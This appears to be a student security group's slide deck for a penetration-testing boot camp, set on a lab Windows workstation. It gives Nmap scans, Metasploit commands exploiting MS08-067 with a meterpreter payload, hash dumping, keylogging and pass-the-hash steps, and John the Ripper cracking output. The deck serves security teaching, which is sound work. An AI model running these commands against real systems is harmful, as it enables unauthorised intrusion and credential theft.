Penetration Testing 101 (Boot-camp) Computer Security Group Mitchell Adair utdcsg.org Outline “Interactive” meeting Introduction to Backtrack A mini penetration test Scenario Methodology Enumeration, Exploitation, Post Exploitation Exercise Summary Resources Scenario Company X wants you to test if their internal hosts are secure. They have given you a sample box with the default security settings the company uses for all user workstations. You take it back to the lab and begin to test it... Outline Enumeration OS, services, versions, filters Exploitation Match a service + version to a known vulnerability Exploit, getting shell access to the box Post Exploitation Shell is just the beginning... ;) Hashes, SSH / GPG keys, pivot, … Enumeration 'Nmap ("Network Mapper") is a free and open source utility for network exploration or security auditing.' - nmap.org nmap [Scan Type(s)] [Options] {target specification} Scan Types Options -sS, Syn -O, OS -sT, Connect -sV, services -sA, Ack -v, verbose … … … Enumeration nmap 192.168.1.1 nmap -v -sV -O 192.168.1.1 -p 1-65535 Default scan, full SYN, top 1000 ports Verbose, services, OS, ports 1 through 65535 nmap -PN --script=smb* -sV -O 192.168.1.1 Don't ping, run all smb* scripts, service, OS Nmap Output Not shown: 996 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe) ... OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft Windows XP SP1 ... Host script results: | smb-os-discovery: Windows 2000 | smb-enum-domains: | Domain: MITCHELL-32D5C5 | |_ SID: S-1-5-21-606747145-1647877149-725345543 | |_ Users: add, Administrator, Guest, s3cr3tus3r, sally ... | Anonymous shares: IPC$ |_ Restricted shares: ADMIN$, C$ ... | smb-check-vulns: |_ MS08-067: VULNERABLE Exploitation Metasploit – Penetration Testing Framework tools, libraries, modules, and user interfaces # msfconsole msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.1.1 set PAYLOAD windows/meterpreter/bind_tcp exploit Post Exploitation Gather useful information SSH & GPG keys, hashes, etc... Meterpreter “post” modules Pivot meterpreter > hashdump sysinfo keyscan_(start | stop | dump) download migrate shell … Post Exploitation We dumped the hashes... now what? Pass the hash Crack the hash John the Ripper a tool to find weak passwords of your users John [options] password-files --wordlist --users, --groups --session, --restore … Post Exploitation John --wordlist=/.../password.lst /tmp/hashes.txt Loaded 6 password hashes with no different salts (NT LM DES [64/64 BS MMX]) ABC123 SECRET BASKETB ALL ADMIN1 (sally) (s3cr3tus3r) (Guest) (webmaster:1) (webmaster:2) (Administrator) guesses: 5 time: 0:00:00:00 100% c/s: 25730 trying: SKIDOO ZHONGGU So... let's get started Boot up to your Backtrack CD passwd /etc/init.d/networking start startx Follow along... let's pwn this box :) Summary Clearly... Company X's default user workstations needs some work. Now let's do the paperwork!... just kidding ;) Hopefully this gives everyone a hands on introduction to Backtrack, some essential tools, and the attacker's mindset & process. Feedback is always appreciated! Resources utdcsg.org Presentations, articles, resources, etc. IRC - irc.oftc.net, #utdcsg Nmap - nmap.org/5/ Metasploit - metasploit.com/ John the Ripper - openwall.com/john/